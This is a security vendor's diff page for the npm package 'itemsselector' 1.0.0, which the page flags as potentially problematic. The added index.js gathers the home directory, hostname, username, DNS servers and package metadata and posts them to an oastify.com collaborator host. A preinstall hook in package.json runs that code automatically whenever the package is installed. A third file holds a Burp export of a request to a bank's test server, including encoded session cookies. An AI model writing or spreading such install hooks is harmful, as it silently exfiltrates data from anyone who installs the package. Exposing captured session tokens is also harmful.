npm - itemsselector - Versions diffs - 1.0.0 - Mend

itemsselector 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of itemsselector might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,47 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+var options = {
+    hostname: "xstg81q612lrayltebfx3lajkaq0ep.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    // console.error(e);
+});
+req.write(postData);
+req.end();

package/package.json ADDED Viewed

@@ -0,0 +1,12 @@
+{
+  "name": "itemsselector",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/sqli1 ADDED Viewed

@@ -0,0 +1,42 @@
+<?xml version="1.0"?>
+<!DOCTYPE items [
+<!ELEMENT items (item*)>
+<!ATTLIST items burpVersion CDATA "">
+<!ATTLIST items exportTime CDATA "">
+<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
+<!ELEMENT time (#PCDATA)>
+<!ELEMENT url (#PCDATA)>
+<!ELEMENT host (#PCDATA)>
+<!ATTLIST host ip CDATA "">
+<!ELEMENT port (#PCDATA)>
+<!ELEMENT protocol (#PCDATA)>
+<!ELEMENT method (#PCDATA)>
+<!ELEMENT path (#PCDATA)>
+<!ELEMENT extension (#PCDATA)>
+<!ELEMENT request (#PCDATA)>
+<!ATTLIST request base64 (true|false) "false">
+<!ELEMENT status (#PCDATA)>
+<!ELEMENT responselength (#PCDATA)>
+<!ELEMENT mimetype (#PCDATA)>
+<!ELEMENT response (#PCDATA)>
+<!ATTLIST response base64 (true|false) "false">
+<!ELEMENT comment (#PCDATA)>
+]>
+<items burpVersion="2022.8.4" exportTime="Sun May 28 18:21:11 IST 2023">
+  <item>
+    <time>Thu Jan 01 05:30:00 IST 1970</time>
+    <url><![CDATA[https://servicenabenterpriseuat.nabtest.com.au/amb/connect]]></url>
+    <host ip="149.96.93.121">servicenabenterpriseuat.nabtest.com.au</host>
+    <port>443</port>
+    <protocol>https</protocol>
+    <method><![CDATA[POST]]></method>
+    <path><![CDATA[/amb/connect]]></path>
+    <extension>null</extension>
+    <request base64="true"><![CDATA[UE9TVCAvYW1iL2Nvbm5lY3QgSFRUUC8xLjENCkhvc3Q6IHNlcnZpY2VuYWJlbnRlcnByaXNldWF0Lm5hYnRlc3QuY29tLmF1DQpDb29raWU6IEJJR2lwU2VydmVycG9vbF9uYWJlbnRlcnByaXNldWF0PWY2MzMyYTc5M2NiMDJjYzIyZTQ2NGM3ZDY5MzFkZTU0OyBKU0VTU0lPTklEPTVCODYyRkNEMjU3NUVGRjZCNzUyODc3OTZFREZFQjMzOyBnbGlkZV91c2VyX3JvdXRlPWdsaWRlLmM2M2Y5MjU4MWE1OWU0OTc2NzQ5MDRmZWZmOWNkN2Y1OyBCQVlFVVhfQlJPV1NFUj1jMGl5MWRmeGVldTFvb3ViDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0OyBydjoxMDkuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMTMuMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KUmVmZXJlcjogaHR0cHM6Ly9zZXJ2aWNlbmFiZW50ZXJwcmlzZXVhdC5uYWJ0ZXN0LmNvbS5hdS9mb3JtZXJfY29sbGVhZ3Vlcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgNClgtVHJhbnNhY3Rpb24tU291cmNlOiBJbnRlcmZhY2U9U2VydmljZS1Qb3J0YWwsSW50ZXJmYWNlLVR5cGU9Zm9ybWVyX2NvbGxlYWd1ZXMsSW50ZXJmYWNlLVN5c0lEPTkzZWU0Mzg0ZGJjZTY0NTQ1NGY5MTUxMzNhOTYxOWJmDQpDb250ZW50LUxlbmd0aDogMTA5DQpPcmlnaW46IGh0dHBzOi8vc2VydmljZW5hYmVudGVycHJpc2V1YXQubmFidGVzdC5jb20uYXUNClNlYy1GZXRjaC1EZXN0OiBlbXB0eQ0KU2VjLUZldGNoLU1vZGU6IGNvcnMNClNlYy1GZXRjaC1TaXRlOiBzYW1lLW9yaWdpbg0KVGU6IHRyYWlsZXJzDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQpbeyJpZCI6IjYiLCJjaGFubmVsIjoiL21ldGEvY29ubmVjdCIsImNvbm5lY3Rpb25UeXBlIjoibG9uZy1wb2xsaW5nIiwiY2xpZW50SWQiOiIzOW9lbjQydGZwaTU3cnNzbjB5cHc4OHY5In1d]]></request>
+    <status>500</status>
+    <responselength>828</responselength>
+    <mimetype>HTML</mimetype>
+    <response base64="true"><![CDATA[SFRUUC8xLjEgNTAwIEludGVybmFsIFNlcnZlciBFcnJvcg0KU2VydmVyOiBzbm93X2FkYw0KRGF0ZTogU3VuLCAyOCBNYXkgMjAyMyAxMjo1MDoyMiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9VVRGLTgNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGNsb3NlDQpTZXQtQ29va2llOiBCSUdpcFNlcnZlcnBvb2xfbmFiZW50ZXJwcmlzZXVhdD1mNjMzMmE3OTNjYjAyY2MyMmU0NjRjN2Q2OTMxZGU1NDsgaHR0cG9ubHk7IHNlY3VyZTsgcGF0aD0vOyBTYW1lU2l0ZT1Ob25lDQpQcmFnbWE6IG5vLXN0b3JlLG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZSxuby1zdG9yZSxtdXN0LXJldmFsaWRhdGUsbWF4LWFnZT0tMQ0KRXhwaXJlczogMA0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KeC1lZGdlLWVuYy1wcm94eS1zdGF0aWM6IHRydWUNCkNyb3NzLU9yaWdpbi1FbWJlZGRlci1Qb2xpY3k6IHJlcXVpcmUtY29ycA0KTGFzdC1Nb2RpZmllZDogRnJpLCAxNyBGZWIgMjAyMyAyMToyNjo0MiBHTVQNCkFjY2VwdC1SYW5nZXM6IGJ5dGVzDQpTdHJpY3QtVHJhbnNwb3J0LVNlY3VyaXR5OiBtYXgtYWdlPTYzMDcyMDAwOyBpbmNsdWRlU3ViRG9tYWlucw0KDQo8IURPQ1RZUEUgaHRtbD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5FcnJvciBQYWdlPC90aXRsZT4KPC9oZWFkPgoKPGJvZHk+CiAgICA8aDIgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbjoxMCU7Ij5Tb3JyeSwgYW4gZXJyb3Igb2NjdXJyZWQgb3IgdGhpcyBwYWdlIGlzbid0IGF2YWlsYWJsZS48L2gyPgo8L2JvZHk+Cgo8L2h0bWw+]]></response>
+    <comment></comment>
+  </item>
+</items>